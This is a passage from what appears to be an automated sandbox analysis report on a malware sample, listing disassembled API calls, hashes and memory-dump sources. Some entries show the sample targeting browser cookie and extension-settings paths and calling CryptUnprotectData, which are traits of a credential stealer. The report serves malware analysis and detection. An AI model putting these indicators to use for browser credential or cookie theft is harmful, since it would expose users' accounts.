                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CreateExitHeapProcess
                            • String ID:
                            • API String ID: 611137554-0
                            • Opcode ID: 0d6b886d4d8359a58756c66a7ce56caa89d10bab1c28017807cc1513ccddc48e
                            • Instruction ID: ec5072d808926f53275ca643ca385318b8069971bffb3bf22e2c22650ba3e4c0
                            • Opcode Fuzzy Hash: 0d6b886d4d8359a58756c66a7ce56caa89d10bab1c28017807cc1513ccddc48e
                            • Instruction Fuzzy Hash: 1DD0677D78170596EA607BF25F4676A368C5ED1784F440420BE08C5692FA16D9918262
                            APIs
                            • RtlFreeHeap.NTDLL(02D10000,00000000,00000000,02B30000), ref: 00A41EFE
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: f0cbcff4f2379d884f7bc6751b0fbe71019ecfca5eafe23c8fdee0fbb937042a
                            • Instruction ID: 87a7ab162ca9905ef2095953f7070a2602d1997348b81f041dc9350c4350f156
                            • Opcode Fuzzy Hash: f0cbcff4f2379d884f7bc6751b0fbe71019ecfca5eafe23c8fdee0fbb937042a
                            • Instruction Fuzzy Hash: B7E0127851420CFBDB14CFD8D944BA97BF8E745305F104189F90887380D7729E40CB91
                            APIs
                            • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00A41CB1,?,00A41D86,?), ref: 00A41E59
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 7106a43d59f415d8f5758be377e890685ed7a2e6f9fcac8d7be59be20f4670f9
                            • Instruction ID: 4b69c4fd7593d638139d4254e6e6c2ca6652ba0993d0dc294ff790c6f2e58309
                            • Opcode Fuzzy Hash: 7106a43d59f415d8f5758be377e890685ed7a2e6f9fcac8d7be59be20f4670f9
                            • Instruction Fuzzy Hash: 61D0123C674308EFF32097B4AC4AB2136D4A3C5755F101521FD19891E0E3B3A8C14634
                            APIs
                            • RtlAllocateHeap.NTDLL(02D10000,00000008,00A43D82), ref: 00A41EB0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 53703c41831ba45968550d2fc4992de17640edbdf37cd5bde9b5c6677a47359f
                            • Instruction ID: b2b6899771630233cd5b17dd9a000eb49629b6d2a59b886997063452e417665d
                            • Opcode Fuzzy Hash: 53703c41831ba45968550d2fc4992de17640edbdf37cd5bde9b5c6677a47359f
                            • Instruction Fuzzy Hash: DDC04C7D170208ABD704DBD8ED55E6A3B9CA789601F404508B6094A590DB62E8018760
                            APIs
                            • Sleep.KERNELBASE(000003E8), ref: 00A42E41
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 5e94a227f48ff07cae11e24e6e5951c846a25af3f0445f5dee8fe3b4f513a826
                            • Instruction ID: 11d9d62c227436faf38c4951fa8b5ecf726479fa79097951c919809d22155bbe
                            • Opcode Fuzzy Hash: 5e94a227f48ff07cae11e24e6e5951c846a25af3f0445f5dee8fe3b4f513a826
                            • Instruction Fuzzy Hash: 06114C78900208E7CB14CF45D551ABDBBB5FF98301FA08198F9068B381E735DE91E7A5
                            APIs
                            • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00A42AF6
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 4ef8044f5ac563d5fdbfac4cee47cf47e90efaf14c43f11e8131432087559a79
                            • Instruction ID: a0d2b1e71e7c72c145519e2f044e63e187c9c4eda8293a326c80a999d01929a0
                            • Opcode Fuzzy Hash: 4ef8044f5ac563d5fdbfac4cee47cf47e90efaf14c43f11e8131432087559a79
                            • Instruction Fuzzy Hash: BC118C38800219E6DB24DF95D5417BC77B2BF94740FA040B9FD422A681E7B95F80E391
                            APIs
                            • NtQueryObject.NTDLL(00A41593,00000001,?,00000000,00000000), ref: 00A4166E
                            • NtQueryObject.NTDLL(00A41593,00000001,?,00000000,00000000), ref: 00A41689
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: ObjectQuery
                            • String ID: \Local Extensions Settings\$\Network\Cookies
                            • API String ID: 2748340528-1141476384
                            • Opcode ID: 03f7c0c0fef40e1b791e0b4acd96f808b29cbfb2f31c7f32200c5193fbef67dc
                            • Instruction ID: 849d871df4afa5287f6b07fe99bb584745dad57b0a1e5c602cb3e1d7cc88310c
                            • Opcode Fuzzy Hash: 03f7c0c0fef40e1b791e0b4acd96f808b29cbfb2f31c7f32200c5193fbef67dc
                            • Instruction Fuzzy Hash: 4121637DA10208BBDB10CB90DD41FDAB779ABC8705F108495B908D7281EAB1EEC4CBA1
                            APIs
                            • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C53
                            • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C63
                            • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C6C
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                            • String ID:
                            • API String ID: 3068283267-0
                            • Opcode ID: 4c57ef4c69f3dd837455790323daee97ba1ffafa26051c3c9159098da65bc9f4
                            • Instruction ID: 8cb8ea2e21177a4525e7eefb6e9863ef81387e6bb94ed56c2186f9ebed76eb5b
                            • Opcode Fuzzy Hash: 4c57ef4c69f3dd837455790323daee97ba1ffafa26051c3c9159098da65bc9f4
                            • Instruction Fuzzy Hash: EBC04C3D3C830566E6506BF06E0BB16375867D6B07F444054F30E980D19ED264114567
                            APIs
                            • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00A41033
                              • Part of subcall function 00A432A0: LocalFree.KERNEL32(?), ref: 00A433BA
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CryptDataFreeLocalUnprotect
                            • String ID:
                            • API String ID: 1561624719-0
                            • Opcode ID: b90ef403e56ee99f7709b66b251991402f596fd1da067321a69f2d5c7f71b651
                            • Instruction ID: 9fec1def134d910736a112d036a417720167404d2cb708d55c17b3c7048ded16
                            • Opcode Fuzzy Hash: b90ef403e56ee99f7709b66b251991402f596fd1da067321a69f2d5c7f71b651
                            • Instruction Fuzzy Hash: C7F01C7A90010CAFDB04DFA8C885EFE77BCEB84314F04856AE9199B241EB31D654CBA0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: